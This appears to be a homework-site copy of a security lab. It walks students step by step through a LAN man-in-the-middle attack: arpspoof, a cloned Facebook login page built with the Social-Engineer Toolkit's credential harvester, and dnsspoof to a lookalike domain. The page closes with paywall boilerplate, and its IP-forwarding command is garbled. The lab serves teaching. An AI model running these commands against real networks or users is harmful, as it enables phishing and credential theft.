Question
MITM requires 3 separate entities. The attacker, victim and web server. Since this is a lab there are multiple controlled variables like the attacker and
MITM requires 3 separate entities. The attacker, victim and web server. Since this is a lab there are multiple controlled variables like the attacker and victim reside on the same LAN subnet with a single gateway. Hence, we only need to spoof the victim and the gateway.
This Lab will be ran on Kali and Windows simultaneously. Kali user would be the attacker and Windows user would be the victim.
Retrieve IP addresses of the Windows machine (Victim/client) and the Web server.
Please use kali virtual box machine to type the commands
Open Common Prompt and type ifconfig /all. Notate the MAC and IP address.
Would the attack work if the URL is secured? http vs https: ?
Note: you can include any valid website address.
Switch the Kali.
Open three Terminal windows to make the victim believe we are the web server and the server to believer we are the victim. Terminal can be found on the dock to the left by default.
Enable IP forwarding - Type echo >1 /proc/sys/ipv4/ip_forward
Would be achieve the results without ip_forward? Why/Why not?
Use arpspoof command:
Note: I have used the IP addresses of web server and victims machine for explanation purposes only. Make sure to input the actual IP addresses of the victim and web server respectively.
Arpspoof Victim to Server - Type in arpspoof 192.168.1.15 192.168.1.1 , .15 belongs to the victim and .1 belongs to the server.
Arpspoof server to victim - arpspoof 192.168.1.1 192.168.1.15.
Executing these commands enables switching, making the victim believe YOU, this host, the attacker is the server and server believe YOU are the victim (its client)
Upload a screenshot after executing arspoof command to ensure the swap of the victim and servers address.
Now, we will make a temporary server with the help of Social Engineering toolkit.
Open a fresh terminal window and type in setoolkit to import the social engineering toolkit and press Enter.
Note: If this is your first time importing or using SET, you will have to accept the Terms and Conditions. To do so, type in y upon prompt.
To select any of the attacks/tools, press the co-related number followed by the enter key.
In this lab, we will be using Social-Engineering Attacks. Type 1 and press enter as shown below.
Next, Select Website Attack Vectors. Type 2 and press enter.
Next, Select Credential Harvester Attack Method. Type 3 and press enter.
Next, Select Site Cloner. Type 2 and press enter.
The system will prompt to put an IP address. Enter your, the attackers, IP address followed by the website you would like to clone. In this case it is 192.168.1.18
We chose Facebook but in reality, the attacker can chose any website, preferably with a username and password fields in the homepage.
Once you press Enter, SET will start cloning the login page of that website. Your screen should look similar to the screenshot below.
Note: While operating the SET at any given time you wish to go back or restart SET. Input 99.
Now that we have setup a temporary web server cloning the desired webpage, we can spoof the DNS to carry out a stealthy attack. DNS spoof will enable the attacker to re-name the cloned site to a appealing name which helps deceive the victim to open that webpage and enter their credentials.
In other words, asking the victim to open 192.168.1.18 (attackers IP) would result in getting caught. Instead, asking the victim to visit a webpage named different yet very close to the actual site. Like HYPERLINK "http://logmein.facebook.com" logmein.facebook.com".
Lets start the DNS spoofing process by creating a text file. To do so type the following in terminal and press enter.
pico hosts.txt
It will open a blank page. Type your IP (attackers) IP followed by space followed by the name you wish to provide to the cloned (fake) webpage. For example: I used HYPERLINK "http://logmein.facebook.com" logmein.facebook.com
Press CTRL + X (control and X) to save and exit.
When the system prompts to save, Press y. You will then be asked many other options as displayed below. Press Enter to exit the screen.
Open a fresh terminal window and type the following command to start DNSspoof.
dnsspoof -i eth0 -f hosts.txt
Switch to Windows and open a web browser.
Navigate to the DNS name you gave to the cloned webpage and login with valid/invalid credentials.
The reason you can use valid or invalid credentials is because, the purpose of this lab is to show you how to get/extract credentials. Since the victim would not know they are being attacked, by default they would enter their valid credentials.
What would happen after you input any (valid/invalid) credentials on the cloned website?
Switch back to Kali
You should see the victims credentials in the terminal window.
Step by Step Solution
There are 3 Steps involved in it
Step: 1
Get Instant Access to Expert-Tailored Solutions
See step-by-step solutions with expert insights and AI powered tools for academic success
Step: 2
Step: 3
Ace Your Homework with AI
Get the answers you need in no time with our AI-driven, step-by-step assistance
Get Started